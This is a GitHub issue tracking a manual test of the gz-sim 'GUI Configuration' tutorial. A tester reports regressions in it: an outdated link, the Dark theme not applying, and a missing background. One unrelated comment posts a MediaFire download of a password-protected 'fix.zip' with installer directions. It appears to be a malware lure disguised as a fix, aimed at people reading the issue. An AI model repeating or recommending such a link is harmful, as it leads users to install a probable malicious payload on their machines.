gazebosim/gazebo_test_cases #1179: gz-sim: GUI Configuration

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/api/sim/9/gui_config.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/gui_config.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Axolot5784, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

avanmalleghem, 2024-09-05:
Interested in !

avanmalleghem, 2024-09-06:
- [Gazebo GUI configuration files](https://gazebosim.org/api/gui/8/config.html) -> from 8 to 9
- Change material_theme from Light to Dark not working
- Don't have the blue background for this image
[image]

Looks like there is some regressions in this tutorial.

closed 2025-08-27 by azeey